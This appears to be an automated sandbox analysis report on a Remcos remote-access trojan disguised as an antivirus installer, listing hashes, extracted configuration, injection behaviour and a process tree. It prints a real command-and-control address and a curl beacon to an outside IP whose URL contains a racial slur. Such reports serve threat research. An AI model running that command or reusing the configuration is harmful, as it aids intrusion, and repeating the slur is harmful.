Analysis
-
max time kernel
141s -
max time network
126s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
arch:x64 arch:x86 image:win10v2004-20240412-en locale:en-us os:windows10-2004-x64 system
submitted
22-04-2024 11:57
Static task
static1
Behavioral task
behavioral1
Sample
och_antivirus.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
och_antivirus.exe
Resource
win10v2004-20240412-en
General
-
Target
och_antivirus.exe
-
Size
17.0MB
-
MD5
41d3613c3bd70904c8ed605bed978987
-
SHA1
8a44183362dc9dd222cb92b0e0a33b7eb3bc2c34
-
SHA256
69b943efb0b8f871b591ce1994bae3e550701a209f79c4d31e2451a69771b166
-
SHA512
bb80f240d675a3c8b0b756f9609bd146faa77bd1c4f23dd0a63825405166908af8aff621e2510e5f67a41e4ea181201ae50a000a3b5bc5ef68dd4806532172b1
-
SSDEEP
196608:H0bq45mXYPrOLaw1alaHwSiLPpizFNwR3LZBh51ZC1uBaPENjZZ:Ubq4oojOLahLhr9dDZwujL
Malware Config
Extracted
remcos
RemoteHost
178.33.57.155:443
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-PM1AI7
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation | WScript.exe
-
Executes dropped EXE 2 IoCs
Processes:
pid | process
2140 | ptSrv.exe
1020 | ptSrv.exe
-
Loads dropped DLL 13 IoCs
Processes:
pid | process
2140 | ptSrv.exe
2140 | ptSrv.exe
2140 | ptSrv.exe
2140 | ptSrv.exe
2140 | ptSrv.exe
2140 | ptSrv.exe
2140 | ptSrv.exe
1020 | ptSrv.exe
1020 | ptSrv.exe
1020 | ptSrv.exe
1020 | ptSrv.exe
1020 | ptSrv.exe
1020 | ptSrv.exe
-
Checks whether UAC is enabled 1 IoCs
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | och_antivirus.exe
-
Drops file in System32 directory 1 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Windows\SysWOW64\explorer.exe | explorer.exe
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
description | pid | process | target process
PID 1020 set thread context of 1172 | 1020 | ptSrv.exe | cmd.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies Internet Explorer settings 4 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | ptSrv.exe
Key created | \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl | ptSrv.exe
Key created | \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | ptSrv.exe
Key created | \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl | ptSrv.exe
-
Modifies registry class 1 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings | explorer.exe
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
pid | process
4600 | och_antivirus.exe
4600 | och_antivirus.exe
2140 | ptSrv.exe
1020 | ptSrv.exe
1020 | ptSrv.exe
1172 | cmd.exe
1172 | cmd.exe
-
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
pid | process
1020 | ptSrv.exe
1172 | cmd.exe
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
description | pid | process
Token: SeTakeOwnershipPrivilege | 2140 | ptSrv.exe
Token: SeTakeOwnershipPrivilege | 2140 | ptSrv.exe
Token: SeTakeOwnershipPrivilege | 1020 | ptSrv.exe
Token: SeTakeOwnershipPrivilege | 1020 | ptSrv.exe
-
Suspicious use of WriteProcessMemory 27 IoCs
Processes:
description | pid | process | target process
PID 4600 wrote to memory of 2140 | 4600 | och_antivirus.exe | ptSrv.exe
PID 4600 wrote to memory of 2140 | 4600 | och_antivirus.exe | ptSrv.exe
PID 4600 wrote to memory of 2140 | 4600 | och_antivirus.exe | ptSrv.exe
PID 2140 wrote to memory of 1020 | 2140 | ptSrv.exe | ptSrv.exe
PID 2140 wrote to memory of 1020 | 2140 | ptSrv.exe | ptSrv.exe
PID 2140 wrote to memory of 1020 | 2140 | ptSrv.exe | ptSrv.exe
PID 1020 wrote to memory of 1172 | 1020 | ptSrv.exe | cmd.exe
PID 1020 wrote to memory of 1172 | 1020 | ptSrv.exe | cmd.exe
PID 1020 wrote to memory of 1172 | 1020 | ptSrv.exe | cmd.exe
PID 1020 wrote to memory of 1172 | 1020 | ptSrv.exe | cmd.exe
PID 1172 wrote to memory of 1720 | 1172 | cmd.exe | explorer.exe
PID 1172 wrote to memory of 1720 | 1172 | cmd.exe | explorer.exe
PID 1172 wrote to memory of 1720 | 1172 | cmd.exe | explorer.exe
PID 1172 wrote to memory of 1720 | 1172 | cmd.exe | explorer.exe
PID 1720 wrote to memory of 4792 | 1720 | explorer.exe | WScript.exe
PID 1720 wrote to memory of 4792 | 1720 | explorer.exe | WScript.exe
PID 1720 wrote to memory of 4792 | 1720 | explorer.exe | WScript.exe
PID 4792 wrote to memory of 2132 | 4792 | WScript.exe | cmd.exe
PID 4792 wrote to memory of 2132 | 4792 | WScript.exe | cmd.exe
PID 4792 wrote to memory of 2132 | 4792 | WScript.exe | cmd.exe
PID 2132 wrote to memory of 3852 | 2132 | cmd.exe | curl.exe
PID 2132 wrote to memory of 3852 | 2132 | cmd.exe | curl.exe
PID 2132 wrote to memory of 3852 | 2132 | cmd.exe | curl.exe
PID 1172 wrote to memory of 1720 | 1172 | cmd.exe | explorer.exe
PID 1720 wrote to memory of 1900 | 1720 | explorer.exe | WScript.exe
PID 1720 wrote to memory of 1900 | 1720 | explorer.exe | WScript.exe
PID 1720 wrote to memory of 1900 | 1720 | explorer.exe | WScript.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\och_antivirus.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\och_antivirus.exe"
  - Checks whether UAC is enabled
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID: 4600
  C:\Users\Admin\AppData\Local\Temp\readermonitor_test_3\ptSrv.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\readermonitor_test_3\ptSrv.exe
    - Executes dropped EXE
    - Loads dropped DLL
    - Modifies Internet Explorer settings
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 2140
    C:\Users\Admin\AppData\Roaming\readermonitor_test_3\ptSrv.exe
      Command line: C:\Users\Admin\AppData\Roaming\readermonitor_test_3\ptSrv.exe
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of SetThreadContext
      - Modifies Internet Explorer settings
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 1020
      C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\SysWOW64\cmd.exe
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious behavior: MapViewOfSection
        - Suspicious use of WriteProcessMemory
        PID: 1172
        C:\Windows\SysWOW64\explorer.exe
          Command line: C:\Windows\SysWOW64\explorer.exe
          - Drops file in System32 directory
          - Modifies registry class
          - Suspicious use of WriteProcessMemory
          PID: 1720
          C:\Windows\SysWOW64\WScript.exe
            Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\check1.vbs"
            - Checks computer location settings
            - Suspicious use of WriteProcessMemory
            PID: 4792
            C:\Windows\SysWOW64\cmd.exe
              Command line: "C:\Windows\System32\cmd.exe" /c curl http://94.156.66.107:9000/hooks/nigger?id=QUBJEIMO
              - Suspicious use of WriteProcessMemory
              PID: 2132
              C:\Windows\SysWOW64\curl.exe
                Command line: curl http://94.156.66.107:9000/hooks/nigger?id=QUBJEIMO
                PID: 3852
          C:\Windows\SysWOW64\WScript.exe
            Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\nihqlluvaxjcqgzkvtkrjgagmgkuam.vbs"
            PID: 1900
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
5.4MB
MD5
045bb8ad2f52ecd9dd9a98c091a8104e
SHA1
5047bf498dad1537f2308cc03e090a6b43f64ccd
SHA256
ad0710db7f86bf4c43b98437ef1da37ac0f246658e6bb426bc6e4cb7a813ccd0
SHA512
ec0df109f03508c6662f32bab28a2d6c58d052f3303bb3b521d6b993453320fffd64194d60340354e299a850bfed87ea8588a4f2f495c7908948309528b4bde2
-
Filesize
1.2MB
MD5
ec23407f1e09987b36550d5b2ebff6d9
SHA1
c462cdf2a3fe50e2bedae7c8b92b4961dbb1276a
SHA256
3ecb2ee304aebc28894984a1704a16d80efdf0b15810272179115b58078faf3c
SHA512
883fdd28a47053218b045755e3d1c1dc3334cf7f4a9735f00df2f6d9211816165779ec96ec63137746abc7cc39f4dbf2c03f6b8a5c0c5d8c642f6ef2690de473
-
Filesize
146B
MD5
85a2ebad40c21ba1da77230265b5351f
SHA1
803822e08837ebda5de7dde963e4872ae2fc4c21
SHA256
b5c409cbb25690b000d9d36c3b5170c1e61fff3d89bdaeadf0166ae28b0fdff9
SHA512
77374eb3d9632c45c25c997380eab1ee338fbe659a24679b3cf28e76d67ffa71e2d2ea326181909d06970dca0e92b5528c1e7f9c866493162fd77170f87ea83a
-
Filesize
324B
MD5
5969db124f530f24b0e1b305ca5a8291
SHA1
5eb79a70cc356a20ba39913489a5cdca36f83011
SHA256
3a4ae3a89b9c1d79fbef06dd969b1307837c0378966c5f7ceddafb1e4660a072
SHA512
0297ea245560c1b5fe64f5a3cd7769ea4e9f09dfc4cc4f16c8d96c5b5d846c8982458991aa143ea5a103436a03c5e7d5b7769b2b87bca5565e856de960e2e290
-
Filesize
427KB
MD5
71a0aa2d05e9174cefd568347bd9c70f
SHA1
cb9247a0fa59e47f72df7d1752424b33a903bbb2
SHA256
fdb3d86c512adff90967cb860d02a4682850ab96727f0376e4d4836504c50e47
SHA512
6e65520528facaa4058720eb16d6bfdcc7bb36923b7e8e6551f3526709f0fabafab123999e618438e6abe7efed4a1332547cfc988f2b24b0e3d91198b95a911a
-
Filesize
81KB
MD5
16b26bc43943531d7d7e379632ed4e63
SHA1
565287de39649e59e653a3612478c2186096d70a
SHA256
346f72c9a7584c2ab6ce65cd38a616c77ebddc0bbab2274c4e89dd5e62237517
SHA512
b5b7b4b8c5ab4276a34956e43f586272b1803ec3609253fee1bcc0a549aed7ba11d47404b023f7b67af701726bab95cca55738e7bd5bca272eca5ac71bb418cc
-
Filesize
590KB
MD5
b3e030ab715a02f8864a79f552a247b7
SHA1
4b1c18370b6e8a69c5f8b3ff543375f74e6e58fa
SHA256
2a844750786ab6798e9a26de7f080802f709c0f12ba7a31545f0c2e449ac0955
SHA512
cd030a0a9e6109b27b5f5d3299024c222287487bc9fac1edd92b760425a939bc307b1d15801fec7e274bd8377b8dd9c7883674d1488af5f062a102275a373eda
-
Filesize
1.0MB
MD5
c08c443520df3d30875ddc0e718f3346
SHA1
ff9ac03414433f597f58dce45dca0eb16d522964
SHA256
a22a7cecd7605ba16418b32079fe856ce4dc923b894986a472963aeb0fc0c6e1
SHA512
bf60ba1ee45f4f55851eb946d34bcd992379245e2ac7bd6da5e5c2bfc296b25ae88918d50d941710121028bfb8f9e32797ba6c885524bcc37426898b2ada1858
-
Filesize
28KB
MD5
db3f3969e8a2f913fe3643d8465171b1
SHA1
736095ea1e02547a6df2586fffdbf31bb7d23656
SHA256
c207be09bf97912ed1271a4186bb626edc530c76f3e5edcac883a98946c41043
SHA512
0a2948bad6e3f6338fb44a727e0de4d268db6a6e5933331b54b12877da0f3b75a796cb32e86cd251b4afc4ca9df5aaccb04db1153b31fc77318ce8909b18d81b
-
Filesize
2.5MB
MD5
2087eb2d3fb639933ebe0a0614fd5218
SHA1
c1a1b75c8e76e000b7045092bd11100904a72840
SHA256
725f50650cb9490027b633a1ff0ae166cb6fc42037dbe72d9a09dd65be323a1f
SHA512
3390536ed543529d01ed7d1616d36d6fde67d68bf6641f901ac5c081ede043943dacd3a7a0bf1729945be800d4ccda00c07511e1c23c7c33d9864be50645502e
-
Filesize
202KB
MD5
64179e64675e822559cac6652298bdfc
SHA1
cceed3b2441146762512918af7bf7f89fb055583
SHA256
c26db97858c427d92e393396f7cb7f9e7ed8f9ce616adcc123d0ec6b055b99c9
SHA512
ef740b35ea5190f8ee47776af1f15ebdd54d39c84da5665e64f67ae6dd0f4b181e955e9a35319a5d0bd764972562e8f2bc44dbdf83c3bedf05674eae902e7280
-
Filesize
165KB
MD5
3c3e960d59cb413791fee1e944b6df72
SHA1
4aa6c90d81692642ca8266bf0d8e249ff3e3ad54
SHA256
88378c228d7827974fe6ec827837af7571290e129082e7070d4bff7a42f4ba67
SHA512
85b471aa2a066c6a779384ed102b895af108af51cd718bb834cda107f71bf5e6fcd8ecc77e9ea4fd7fd3ddbc10b1f57870a9bafcbbfa1be8e2ba224651d77aac
-
Filesize
103KB
MD5
c2b06a78b6c07a1371b6aed1dbf4fc37
SHA1
b8847693e7cd3637b1b400e71430cdf629de2e64
SHA256
9e2b2d67d0e70651a64a3febee9f2698d8a939633587fe973a30758368cffc04
SHA512
219965e4b3e9f237f75d9306bdf5a08c872cded973009da64c58221e1bbdbfda35e4861c4c0b6687fca7c67ef496b307695af5e1270f8d5c3cf71a3fc02c6411